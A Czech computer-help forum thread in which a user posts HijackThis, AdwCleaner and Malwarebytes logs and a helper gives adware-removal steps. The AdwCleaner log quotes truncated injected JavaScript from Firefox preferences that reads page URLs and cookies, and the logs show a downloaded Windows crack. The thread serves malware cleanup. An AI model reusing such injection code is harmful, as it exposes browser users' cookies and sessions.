PC-HELP.CZ

Zdravím, prosím o kontrolu logu. Po reinstalaci PC jsem nainstalovat pár "základních" programů, ale Avast mi teď cca každou minutu vyhodí hlášku o infekci. Cílová cesta infikovaných souborů vždy vede k firefox.cz.

Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 19:40:52, on 18.8.2014
Platform: Windows 7 SP1 (WinNT 6.00.3505)
MSIE: Internet Explorer v11.0 (11.00.9600.17239)
Boot mode: Normal

Running processes:
C:\Program Files\AVAST Software\Avast\avastui.exe
C:\Program Files (x86)\Skype\Phone\Skype.exe
C:\Program Files (x86)\Mozilla Firefox\firefox.exe
C:\Program Files (x86)\Mozilla Firefox\plugin-container.exe
C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerPlugin_14_0_0_179.exe
C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerPlugin_14_0_0_179.exe
C:\Users\Jakub\Downloads\hijackthis.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://websearch.wonderfulsearches.info ... Z&unqvl=60
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/p/?LinkId=255141
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://websearch.wonderfulsearches.info ... Z&unqvl=60
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch =
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
F2 - REG:system.ini: UserInit=userinit.exe
O2 - BHO: avast! Online Security - {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll
O4 - HKLM\..\Run: [AvastUI.exe] "C:\Program Files\AVAST Software\Avast\AvastUI.exe" /nogui
O4 - HKUS\S-1-5-19\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-19\..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-20\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun (User 'NETWORK SERVICE')
O4 - HKUS\S-1-5-20\..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe (User 'NETWORK SERVICE')
O11 - Options group: [ACCELERATED_GRAPHICS] Accelerated graphics
O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\Windows\System32\alg.exe (file missing)
O23 - Service: AMD External Events Utility - Unknown owner - C:\Windows\system32\atiesrxx.exe (file missing)
O23 - Service: avast! Antivirus - AVAST Software - C:\Program Files\AVAST Software\Avast\AvastSvc.exe
O23 - Service: @%SystemRoot%\system32\efssvc.dll,-100 (EFS) - Unknown owner - C:\Windows\System32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\fxsresm.dll,-118 (Fax) - Unknown owner - C:\Windows\system32\fxssvc.exe (file missing)
O23 - Service: @%SystemRoot%\system32\ieetwcollectorres.dll,-1000 (IEEtwCollectorService) - Unknown owner - C:\Windows\system32\IEEtwCollector.exe (file missing)
O23 - Service: @keyiso.dll,-100 (KeyIso) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: Mozilla Maintenance Service (MozillaMaintenance) - Mozilla Foundation - C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\Windows\System32\msdtc.exe (file missing)
O23 - Service: @%SystemRoot%\System32\netlogon.dll,-102 (Netlogon) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\psbase.dll,-300 (ProtectedStorage) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\Windows\system32\locator.exe (file missing)
O23 - Service: @%SystemRoot%\system32\samsrv.dll,-1 (SamSs) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: Skype Updater (SkypeUpdate) - Skype Technologies - C:\Program Files (x86)\Skype\Updater\Updater.exe
O23 - Service: @%SystemRoot%\system32\snmptrap.exe,-3 (SNMPTRAP) - Unknown owner - C:\Windows\System32\snmptrap.exe (file missing)
O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\Windows\System32\spoolsv.exe (file missing)
O23 - Service: @%SystemRoot%\system32\sppsvc.exe,-101 (sppsvc) - Unknown owner - C:\Windows\system32\sppsvc.exe (file missing)
O23 - Service: @%SystemRoot%\system32\ui0detect.exe,-101 (UI0Detect) - Unknown owner - C:\Windows\system32\UI0Detect.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vaultsvc.dll,-1003 (VaultSvc) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\Windows\System32\vds.exe (file missing)
O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\Windows\system32\vssvc.exe (file missing)
O23 - Service: @%SystemRoot%\system32\Wat\WatUX.exe,-601 (WatAdminSvc) - Unknown owner - C:\Windows\system32\Wat\WatAdminSvc.exe (file missing)
O23 - Service: @%systemroot%\system32\wbengine.exe,-104 (wbengine) - Unknown owner - C:\Windows\system32\wbengine.exe (file missing)
O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\Windows\system32\wbem\WmiApSrv.exe (file missing)
O23 - Service: @%PROGRAMFILES%\Windows Media Player\wmpnetwk.exe,-101 (WMPNetworkSvc) - Unknown owner - C:\Program Files (x86)\Windows Media Player\wmpnetwk.exe (file missing)

--
End of file - 5784 bytes

Stáhni si ATF Cleaner
Poklepej na ATF Cleaner.exe, klikni na select all found, poté:
-Když používáš Firefox (Mozzila), klikni na Firefox nahoře a vyber: Select All, poté klikni na Empty Selected.
-Když používáš Operu, klikni nahoře na Operu a vyber: Select All, poté klikni na Empty Selected. Poté klikni na Main (hlavní stránku ) a klikni na Empty Selected.
Po vyčištění klikni na Exit k zavření programu.
ATF-Cleaner je jednoduchý nástroj na odstranění historie z webového prohlížeče. Program dokáže odstranit cache, cookies, historii a další stopy po surfování na Internetu. Mezi podporované prohlížeče patří Internet Explorer, Firefox a Opera. Aplikace navíc umí odstranit dočasné soubory Windows, vysypat koš atd.

- Pokud používáš jen Google Chrome , tak ATF nemusíš použít.

Stáhni si TFC
Otevři soubor a zavři všechny ostatní okna, Klikni na Start k zahájení procesu. Program by neměl trvat dlouho.
Poté by se měl PC restartovat, pokud ne , proveď sám.

Stáhni AdwCleaner (by Xplode)
http://www.bleepingcomputer.com/download/adwcleaner/

Ulož si ho na svojí plochu
Ukonči všechny programy , okna a prohlížeče
Spusť program poklepáním a klikni na „Prohledat-Scan“
Po skenu se objeví log ( jinak je uložen systémovem disku jako AdwCleaner[R?].txt), jeho obsah sem celý vlož.

Stáhni si Malwarebytes' Anti-Malware
- Při instalaci odeber zatržítko u „Povolit bezplatnou zkušební verzi Malwarebytes' Anti-Malware Premium“
Nainstaluj a spusť ho
- na konci instalace se ujisti že máš zvoleny/zatrhnuty obě možnosti:
Aktualizace Malwarebytes' Anti-Malware a Spustit aplikaci Malwarebytes' Anti-Malware, pokud jo tak klikni na tlačítko konec
- pokud bude nalezena aktualizace, tak se stáhne a nainstaluje
- program se po té spustí a klikni na Skenovat nyní a
- po proběhnutí programu se ti objeví hláška vpravo dole tak klikni na b] Kopírovat do schránky [/b]a a vlož sem celý log.

- po té klikni na tlačítko Exit, objeví se ti hláška tak zvol Ano
(zatím nic nemaž!).

Pokud budou problémy , spusť v nouz. režimu.

# AdwCleaner v3.307 - Report created 19/08/2014 at 19:43:37
# Updated 17/08/2014 by Xplode
# Operating System : Windows 7 Ultimate Service Pack 1 (64 bits)
# Username : Jakub - JAKUB-PC
# Running from : C:\Users\Jakub\Downloads\adwcleaner_3.307.exe
# Option : Scan

***** [ Services ] *****

***** [ Files / Folders ] *****

File Found : C:\Users\Jakub\AppData\Roaming\Mozilla\Firefox\Profiles\xlin0hej.default\searchplugins\WebSearch.xml
File Found : C:\Windows\System32\GroupPolicy\Machine\Registry.pol
Folder Found : C:\Program Files (x86)\Adblocker
Folder Found : C:\Program Files (x86)\Adblocker
Folder Found : C:\Program Files (x86)\EZDownloader
Folder Found : C:\Program Files (x86)\MySearch
Folder Found : C:\Program Files (x86)\ppRicceCihop
Folder Found : C:\Program Files (x86)\priacechop
Folder Found : C:\Program Files (x86)\priCEchop
Folder Found : C:\Program Files (x86)\SW-Booster
Folder Found : C:\ProgramData\Adblocker
Folder Found : C:\ProgramData\Adblocker
Folder Found : C:\ProgramData\MySearch
Folder Found : C:\ProgramData\ppRicceCihop
Folder Found : C:\ProgramData\priacechop
Folder Found : C:\ProgramData\priCEchop
Folder Found : C:\Users\Administrator\AppData\Local\Chromatic Browser
Folder Found : C:\Users\Administrator\AppData\Local\torch
Folder Found : C:\Users\Guest\AppData\Local\Chromatic Browser
Folder Found : C:\Users\Guest\AppData\Local\torch
Folder Found : C:\Users\Jakub\AppData\Local\Chromatic Browser
Folder Found : C:\Users\Jakub\AppData\Local\torch

***** [ Scheduled Tasks ] *****

***** [ Shortcuts ] *****

***** [ Registry ] *****

Key Found : HKCU\Software\AppDataLow\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}
Key Found : HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}
Key Found : HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}
Key Found : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{BB74DE59-BC4C-4172-9AC4-73315F71CFFE}
Key Found : HKCU\Software\RegisteredApplicationsEx
Key Found : [x64] HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{BB74DE59-BC4C-4172-9AC4-73315F71CFFE}
Key Found : [x64] HKCU\Software\RegisteredApplicationsEx
Key Found : HKLM\SOFTWARE\{3A7D3E19-1B79-4E4E-BD96-5467DA2C4EF0}
Key Found : HKLM\SOFTWARE\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}
Key Found : HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}
Key Found : HKLM\SOFTWARE\{77D46E27-0E41-4478-87A6-AABE6FBCF252}
Key Found : HKLM\SOFTWARE\Classes\Interface\{EAF749DC-CD87-4B04-B22A-D4AC3FBCB2BC}
Key Found : HKLM\SOFTWARE\Classes\TypeLib\{E2343056-CC08-46AC-B898-BFC7ACF4E755}
Key Found : HKLM\SOFTWARE\Microsoft\Internet Explorer\Extension Compatibility\{74F475FA-6C75-43BD-AAB9-ECDA6184F600}
Key Found : HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{BB74DE59-BC4C-4172-9AC4-73315F71CFFE}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{4820778D-AB0D-6D18-C316-52A6A0E1D507}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5F189DF5-2D05-472B-9091-84D9848AE48B}{d0e87c27}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C670DCAE-E392-AA32-6F42-143C7FC4BDFD}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\S-2060245759
Key Found : HKLM\SOFTWARE\SW-Booster
Key Found : HKLM\SOFTWARE\systweak
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{EAF749DC-CD87-4B04-B22A-D4AC3FBCB2BC}

***** [ Browsers ] *****

-\\ Internet Explorer v11.0.9600.17239

Setting Found : HKCU\Software\Microsoft\Internet Explorer\Main [Start Page] - hxxp://websearch.wonderfulsearches.info ... Z&unqvl=60
Setting Found : HKLM\SOFTWARE\Microsoft\Internet Explorer\Main [Start Page] - hxxp://websearch.wonderfulsearches.info ... Z&unqvl=60

-\\ Mozilla Firefox v31.0 (x86 cs)

[ File : C:\Users\Jakub\AppData\Roaming\Mozilla\Firefox\Profiles\xlin0hej.default\prefs.js ]

Line Found : user_pref("browser.search.defaultenginename,S", "WebSearch");
Line Found : user_pref("browser.search.defaulturl", "hxxp://websearch.wonderfulsearches.info/?pid=2145&r=2014/08/17&hid=2400403269968452107&lg=EN&cc=CZ&unqvl=60&l=1&q=");
Line Found : user_pref("browser.search.order.1", "WebSearch");
Line Found : user_pref("browser.search.order.1,S", "WebSearch");
Line Found : user_pref("browser.search.selectedEngine,S", "WebSearch");
Line Found : user_pref("extensions.MOHby0gw.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumorob[...]
Line Found : user_pref("extensions.PQi53ff4a.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumoro[...]
Line Found : user_pref("extensions.iGA.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumorobo.net[...]
Line Found : user_pref("extensions.jbWUo5IK3b.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumor[...]
Line Found : user_pref("extensions.sytlW.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumorobo.n[...]
Line Found : user_pref("keyword.URL", "hxxp://websearch.wonderfulsearches.info/?pid=2145&r=2014/08/17&hid=2400403269968452107&lg=EN&cc=CZ&unqvl=60&l=1&q=");

-\\ Google Chrome v

*************************

AdwCleaner[R0].txt - [5757 octets] - [19/08/2014 19:43:37]

########## EOF - C:\AdwCleaner\AdwCleaner[R0].txt - [5817 octets] ##########

Malwarebytes Anti-Malware
www.malwarebytes.org

Scan Date: 19.8.2014
Scan Time: 19:47:11
Logfile:
Administrator: Yes

Version: 2.00.2.1012
Malware Database: v2014.08.19.08
Rootkit Database: v2014.08.16.01
License: Free
Malware Protection: Disabled
Malicious Website Protection: Disabled
Self-protection: Disabled

OS: Windows 7 Service Pack 1
CPU: x64
File System: NTFS
User: Jakub

Scan Type: Threat Scan
Result: Completed
Objects Scanned: 305191
Time Elapsed: 10 min, 49 sec

Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Disabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled

Processes: 0
(No malicious items detected)

Modules: 0
(No malicious items detected)

Registry Keys: 56
PUP.Optional.Preload, HKLM\SOFTWARE\CLASSES\CLSID\{EB886C70-281E-BBA0-BB6D-F39F2A11153C}, , [d59f07c1aecd86b0a976c3dc4db4a25e],
PUP.Optional.Preload, HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\BROWSER HELPER OBJECTS\{EB886C70-281E-BBA0-BB6D-F39F2A11153C}, , [d59f07c1aecd86b0a976c3dc4db4a25e],
PUP.Optional.Preload, HKLM\SOFTWARE\CLASSES\pricechOp.pricechOp, , [d59f07c1aecd86b0a976c3dc4db4a25e],
PUP.Optional.Preload, HKLM\SOFTWARE\CLASSES\pricechOp.pricechOp.3.9, , [d59f07c1aecd86b0a976c3dc4db4a25e],
PUP.Optional.Preload, HKLM\SOFTWARE\WOW6432NODE\CLASSES\pricechOp.pricechOp, , [d59f07c1aecd86b0a976c3dc4db4a25e],
PUP.Optional.Preload, HKLM\SOFTWARE\WOW6432NODE\CLASSES\pricechOp.pricechOp.3.9, , [d59f07c1aecd86b0a976c3dc4db4a25e],
PUP.Optional.Preload, HKLM\SOFTWARE\WOW6432NODE\CLASSES\CLSID\{EB886C70-281E-BBA0-BB6D-F39F2A11153C}, , [d59f07c1aecd86b0a976c3dc4db4a25e],
PUP.Optional.Preload, HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\PREAPPROVED\{EB886C70-281E-BBA0-BB6D-F39F2A11153C}, , [d59f07c1aecd86b0a976c3dc4db4a25e],
PUP.Optional.Preload, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\PREAPPROVED\{EB886C70-281E-BBA0-BB6D-F39F2A11153C}, , [d59f07c1aecd86b0a976c3dc4db4a25e],
PUP.Optional.Preload, HKLM\SOFTWARE\CLASSES\CLSID\{EB886C70-281E-BBA0-BB6D-F39F2A11153C}\INPROCSERVER32, , [d59f07c1aecd86b0a976c3dc4db4a25e],
PUP.Optional.Preload, HKLM\SOFTWARE\CLASSES\CLSID\{D3D758FC-2B7D-C142-F7D3-76C52BD68872}, , [2f45b4145625ec4ac659b1ee3cc5916f],
PUP.Optional.Preload, HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\BROWSER HELPER OBJECTS\{D3D758FC-2B7D-C142-F7D3-76C52BD68872}, , [2f45b4145625ec4ac659b1ee3cc5916f],
PUP.Optional.Preload, HKLM\SOFTWARE\CLASSES\prIccechop.prIccechop, , [2f45b4145625ec4ac659b1ee3cc5916f],
PUP.Optional.Preload, HKLM\SOFTWARE\CLASSES\prIccechop.prIccechop.3.9, , [2f45b4145625ec4ac659b1ee3cc5916f],
PUP.Optional.Preload, HKLM\SOFTWARE\WOW6432NODE\CLASSES\prIccechop.prIccechop, , [2f45b4145625ec4ac659b1ee3cc5916f],
PUP.Optional.Preload, HKLM\SOFTWARE\WOW6432NODE\CLASSES\prIccechop.prIccechop.3.9, , [2f45b4145625ec4ac659b1ee3cc5916f],
PUP.Optional.Preload, HKLM\SOFTWARE\WOW6432NODE\CLASSES\CLSID\{D3D758FC-2B7D-C142-F7D3-76C52BD68872}, , [2f45b4145625ec4ac659b1ee3cc5916f],
PUP.Optional.Preload, HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\PREAPPROVED\{D3D758FC-2B7D-C142-F7D3-76C52BD68872}, , [2f45b4145625ec4ac659b1ee3cc5916f],
PUP.Optional.Preload, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\PREAPPROVED\{D3D758FC-2B7D-C142-F7D3-76C52BD68872}, , [2f45b4145625ec4ac659b1ee3cc5916f],
PUP.Optional.Preload, HKLM\SOFTWARE\CLASSES\CLSID\{D3D758FC-2B7D-C142-F7D3-76C52BD68872}\INPROCSERVER32, , [2f45b4145625ec4ac659b1ee3cc5916f],
PUP.Optional.Preload, HKLM\SOFTWARE\CLASSES\CLSID\{8186D2C6-66D8-C8C4-A740-C5634313A63D}, , [274d1fa9cfac1620db443b64db26629e],
PUP.Optional.Preload, HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\BROWSER HELPER OBJECTS\{8186D2C6-66D8-C8C4-A740-C5634313A63D}, , [274d1fa9cfac1620db443b64db26629e],
PUP.Optional.Preload, HKLM\SOFTWARE\CLASSES\priaceChop.priaceChop, , [274d1fa9cfac1620db443b64db26629e],
PUP.Optional.Preload, HKLM\SOFTWARE\CLASSES\priaceChop.priaceChop.3.9, , [274d1fa9cfac1620db443b64db26629e],
PUP.Optional.Preload, HKLM\SOFTWARE\WOW6432NODE\CLASSES\priaceChop.priaceChop, , [274d1fa9cfac1620db443b64db26629e],
PUP.Optional.Preload, HKLM\SOFTWARE\WOW6432NODE\CLASSES\priaceChop.priaceChop.3.9, , [274d1fa9cfac1620db443b64db26629e],
PUP.Optional.Preload, HKLM\SOFTWARE\WOW6432NODE\CLASSES\CLSID\{8186D2C6-66D8-C8C4-A740-C5634313A63D}, , [274d1fa9cfac1620db443b64db26629e],
PUP.Optional.Preload, HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\PREAPPROVED\{8186D2C6-66D8-C8C4-A740-C5634313A63D}, , [274d1fa9cfac1620db443b64db26629e],
PUP.Optional.Preload, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\PREAPPROVED\{8186D2C6-66D8-C8C4-A740-C5634313A63D}, , [274d1fa9cfac1620db443b64db26629e],
PUP.Optional.Preload, HKLM\SOFTWARE\CLASSES\CLSID\{8186D2C6-66D8-C8C4-A740-C5634313A63D}\INPROCSERVER32, , [274d1fa9cfac1620db443b64db26629e],
PUP.Optional.Preload, HKLM\SOFTWARE\CLASSES\CLSID\{9A28C5C3-6EE1-6792-65B5-E706A7A608EF}, , [482c38900675ed49dd42a6f9649db848],
PUP.Optional.Preload, HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\BROWSER HELPER OBJECTS\{9A28C5C3-6EE1-6792-65B5-E706A7A608EF}, , [482c38900675ed49dd42a6f9649db848],
PUP.Optional.Preload, HKLM\SOFTWARE\CLASSES\Adblocker.Adblocker, , [482c38900675ed49dd42a6f9649db848],
PUP.Optional.Preload, HKLM\SOFTWARE\CLASSES\Adblocker.Adblocker.1.0, , [482c38900675ed49dd42a6f9649db848],
PUP.Optional.Preload, HKLM\SOFTWARE\WOW6432NODE\CLASSES\Adblocker.Adblocker, , [482c38900675ed49dd42a6f9649db848],
PUP.Optional.Preload, HKLM\SOFTWARE\WOW6432NODE\CLASSES\Adblocker.Adblocker.1.0, , [482c38900675ed49dd42a6f9649db848],
PUP.Optional.Preload, HKLM\SOFTWARE\WOW6432NODE\CLASSES\CLSID\{9A28C5C3-6EE1-6792-65B5-E706A7A608EF}, , [482c38900675ed49dd42a6f9649db848],
PUP.Optional.Preload, HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\PREAPPROVED\{9A28C5C3-6EE1-6792-65B5-E706A7A608EF}, , [482c38900675ed49dd42a6f9649db848],
PUP.Optional.Preload, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\PREAPPROVED\{9A28C5C3-6EE1-6792-65B5-E706A7A608EF}, , [482c38900675ed49dd42a6f9649db848],
PUP.Optional.Preload, HKLM\SOFTWARE\CLASSES\CLSID\{9A28C5C3-6EE1-6792-65B5-E706A7A608EF}\INPROCSERVER32, , [482c38900675ed49dd42a6f9649db848],
PUP.Optional.Preload, HKLM\SOFTWARE\CLASSES\CLSID\{CA49D376-22C3-8205-FB0E-E9A6774CDDE1}, , [83f104c447343afc0b14c0dfc9389f61],
PUP.Optional.Preload, HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\BROWSER HELPER OBJECTS\{CA49D376-22C3-8205-FB0E-E9A6774CDDE1}, , [83f104c447343afc0b14c0dfc9389f61],
PUP.Optional.Preload, HKLM\SOFTWARE\CLASSES\MySearch.MySearch, , [83f104c447343afc0b14c0dfc9389f61],
PUP.Optional.Preload, HKLM\SOFTWARE\CLASSES\MySearch.MySearch.2.1, , [83f104c447343afc0b14c0dfc9389f61],
PUP.Optional.Preload, HKLM\SOFTWARE\WOW6432NODE\CLASSES\MySearch.MySearch, , [83f104c447343afc0b14c0dfc9389f61],
PUP.Optional.Preload, HKLM\SOFTWARE\WOW6432NODE\CLASSES\MySearch.MySearch.2.1, , [83f104c447343afc0b14c0dfc9389f61],
PUP.Optional.Preload, HKLM\SOFTWARE\WOW6432NODE\CLASSES\CLSID\{CA49D376-22C3-8205-FB0E-E9A6774CDDE1}, , [83f104c447343afc0b14c0dfc9389f61],
PUP.Optional.Preload, HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\PREAPPROVED\{CA49D376-22C3-8205-FB0E-E9A6774CDDE1}, , [83f104c447343afc0b14c0dfc9389f61],
PUP.Optional.Preload, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\PREAPPROVED\{CA49D376-22C3-8205-FB0E-E9A6774CDDE1}, , [83f104c447343afc0b14c0dfc9389f61],
PUP.Optional.Preload, HKLM\SOFTWARE\CLASSES\CLSID\{CA49D376-22C3-8205-FB0E-E9A6774CDDE1}\INPROCSERVER32, , [83f104c447343afc0b14c0dfc9389f61],
PUP.Optional.SWBooster.A, HKLM\SOFTWARE\WOW6432NODE\SW-Booster, , [b6be30984c2f85b1ab0b7976cc36e719],
PUP.Optional.FastSearchings, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{BB74DE59-BC4C-4172-9AC4-73315F71CFFE}, , [83f1587099e20d29509bf058a361d828],
PUP.Optional.Booster.A, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\S-2060245759, , [de96b612b9c240f689ed6488cb37d52b],
PUP.Optional.Booster.A, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\{5F189DF5-2D05-472B-9091-84D9848AE48B}{d0e87c27}, , [b6be9137ef8c2511d89f9e4e17eba25e],
PUP.Optional.Booster, HKLM\SOFTWARE\WOW6432NODE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_D0E87C27, , [f77d01c7df9c58de03ed6fd9ec1857a9],
PUP.Optional.WebSearchInfo, HKU\S-1-5-21-288487796-1725444996-988690671-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{BB74DE59-BC4C-4172-9AC4-73315F71CFFE}, , [185c3395daa172c42b1c4ee7c63e7888],

Registry Values: 2
PUP.Optional.Booster, HKLM\SOFTWARE\WOW6432NODE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_D0E87C27|svn, SW-Sustainer, , [f77d01c7df9c58de03ed6fd9ec1857a9]
PUP.Optional.WebSearchInfo, HKU\S-1-5-21-288487796-1725444996-988690671-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES|DefaultScope, {BB74DE59-BC4C-4172-9AC4-73315F71CFFE}, , [de967553cbb08bab94b4a293e81c13ed]

Registry Data: 2
PUP.Optional.WebSearchInfo, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\MAIN|Start Page, http://websearch.wonderfulsearches.info ... Z&unqvl=60, Good: (www.google.com), Bad: (http://websearch.wonderfulsearches.info ... Z&unqvl=60),,[bcb8d6f2fd7e91a53a7d7c51897b4cb4]
PUP.Optional.WebSearchInfo, HKU\S-1-5-21-288487796-1725444996-988690671-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN|Start Page, http://websearch.wonderfulsearches.info ... Z&unqvl=60, Good: (www.google.com), Bad: (http://websearch.wonderfulsearches.info ... Z&unqvl=60),,[a1d33f89c9b29c9a34822ca1659f8977]

Folders: 6
PUP.Optional.MySearch.A, C:\Program Files (x86)\MySearch, , [75ff19afc2b92b0b0da85b941fe301ff],
PUP.Optional.EZDownloader.A, C:\Program Files (x86)\EZDownloader, , [452f02c6e59659dd17025367d032966a],
PUP.Optional.Booster.A, C:\Program Files (x86)\SW-Booster, , [6212b117e299b38310d78d45b250aa56],
PUP.Optional.MultiPlug.A, C:\ProgramData\priCEchop, , [c9ab9f29e794f64076e3d6fe9171a45c],
PUP.Optional.MultiPlug.A, C:\Program Files (x86)\priCEchop, , [acc85672f18a6fc73c1ea92b778b11ef],
PUP.Optional.Booster.A, C:\ProgramData\PlutoApp\SW-Booster, , [284c03c589f21d19c004f8e7ea1806fa],

Files: 14
PUP.Optional.Preload, C:\Program Files (x86)\priCEchop\E05zLS.x64.dll, , [d59f07c1aecd86b0a976c3dc4db4a25e],
PUP.Optional.Preload, C:\Program Files (x86)\priacechop\y.x64.dll, , [2f45b4145625ec4ac659b1ee3cc5916f],
PUP.Optional.Preload, C:\Program Files (x86)\ppRicceCihop\w.x64.dll, , [274d1fa9cfac1620db443b64db26629e],
PUP.Optional.Preload, C:\Program Files (x86)\Adblocker\fKy7Pv9w.x64.dll, , [482c38900675ed49dd42a6f9649db848],
PUP.Optional.Preload, C:\Program Files (x86)\MySearch\ohxKrxZ.x64.dll, , [83f104c447343afc0b14c0dfc9389f61],
PUP.Optional.Installrex, C:\Users\Jakub\Downloads\Windows 7 Ultimate Crack Genuine Activator ~ Free Crack Files Download.exe, , [95df497f542741f541a0f1ba9a6748b8],
PUP.Optional.MySearch.A, C:\Program Files (x86)\MySearch\ohxKrxZ.tlb, , [75ff19afc2b92b0b0da85b941fe301ff],
PUP.Optional.MySearch.A, C:\Program Files (x86)\MySearch\ohxKrxZ.dat, , [75ff19afc2b92b0b0da85b941fe301ff],
PUP.Optional.WebSearch.A, C:\Users\Jakub\AppData\Roaming\Mozilla\Firefox\Profiles\xlin0hej.default\searchplugins\WebSearch.xml, , [4331428668139c9a19e91ee9699a60a0],
